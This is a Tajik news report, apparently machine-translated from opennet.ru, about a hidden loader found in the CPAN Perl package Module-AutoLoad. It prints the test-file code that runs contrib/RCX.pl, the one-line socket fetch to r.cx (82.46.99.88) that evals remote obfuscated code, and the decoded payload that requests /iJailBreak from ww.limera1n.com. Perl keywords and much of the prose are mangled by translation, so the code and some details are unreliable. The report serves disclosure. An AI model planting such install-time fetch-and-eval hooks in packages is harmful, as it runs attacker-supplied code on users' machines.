Рамзи зараровар дар бастаи Module-AutoLoad Perl ошкор шуд

Дар бастаи Perl, ки тавассути директорияи CPAN тақсим карда мешавад Модул - Автоборкунӣ, барои ба таври худкор бор кардани модулҳои CPAN дар парвоз тарҳрезӣ шудааст, муайян карда шуд рамзи зараровар. Вуруди зараровар буд ёфт дар рамзи санҷиш 05_rcx.t, ки аз соли 2011 инҷониб интиқол дода мешавад.
Қобили зикр аст, ки саволҳо дар бораи боркунии рамзи шубҳанок ба миён омаданд Stackoverflow бозгашт дар 2016.

Фаъолияти зараровар ба кӯшиши зеркашӣ ва иҷро кардани код аз сервери тарафи сеюм (http://r.cx:1/) ҳангоми иҷрои пакети санҷишӣ ҳангоми насби модул оғоз меёбад. Тахмин меравад, ки коди дар аввал аз сервери беруна зеркашидашуда зараровар набуд, вале ҳоло дархост ба домени ww.limera1n.com равона карда мешавад, ки қисми он кодро барои иҷро таъмин мекунад.

Барои ташкили зеркашӣ дар файл 05_rcx.t Рамзи зерин истифода мешавад:

ман $prog = __FILE__;
$prog =~ s{[^/]+\.t}{../contrib/RCX.pl}x;
$ кӯшиши ман = `$^X $prog`;

Рамзи муайяншуда боиси иҷро шудани скрипт мегардад ../contrib/RCX.pl, ки мазмуни он ба сатр кам карда шудааст:

lib do{eval&&botstrap("RCX")if$b=new IO::Socket::INET 82.46.99.88-ро истифода баред.":1″};

Ин скрипт бор мекунад ошуфтааст бо истифода аз хидмат perlobfuscator.com код аз мизбони беруна r.cx (рамзҳои аломатҳои 82.46.99.88 ба матни "R.cX" мувофиқат мекунанд) ва онро дар блоки арзёбӣ иҷро мекунад.

$ perl -MIO::Socket -e’$b=нав IO::Socket::INET 82.46.99.88.”:1″; чоп ;'
eval unpack u=>q{_<‘)I;G1[)&(];F5W($E/.CI3;V-K970Z.DE….}

Пас аз кушодан, дар ниҳоят амалҳои зерин иҷро карда мешаванд: код:

чоп {$b=нав IO::Socket::INET"ww.limera1n.com:80″}"ГЕЗ /iJailBreak
";evalor return warn$@while$b;1

Бастаи мушкилот ҳоло аз анбор хориҷ карда шудааст. ТАНКИД (Perl Authors Upload Server) ва ҳисоби муаллифи модул баста шудааст. Дар ин ҳолат, модул то ҳол боқӣ мемонад дастрас аст дар бойгонии MetaCPAN ва метавонад мустақиман аз MetaCPAN бо истифода аз баъзе утилитаҳо, ба монанди cpanminus насб карда шавад. Қайд карда мешавадки пакет ба таври васеъ пахн карда нашудааст.

Муҳокима ҷолиб аст вобаста аст ва муаллифи модул, ки иттилоъ дар бораи ворид шудани коди зараровар пас аз рахна шудани сайташ "r.cx"-ро рад кард ва тавзеҳ дод, ки ӯ танҳо кайф мекунад ва perlobfuscator.com-ро на барои пинҳон кардани чизе, балки барои кам кардани андоза истифода кардааст. код ва содда кардани нусхабардории он тавассути буфер. Интихоби номи функсияи "botstrap" бо он шарҳ дода мешавад, ки ин калима "ба бот садо медиҳад ва аз bootstrap кӯтоҳтар аст". Муаллифи модул инчунин итминон додааст, ки манипуляцияҳои муайяншуда амалҳои зарароварро иҷро намекунанд, балки танҳо боркунӣ ва иҷрои кодро тавассути TCP нишон медиҳанд.

Манбаъ: opennet.ru

Илова Эзоҳ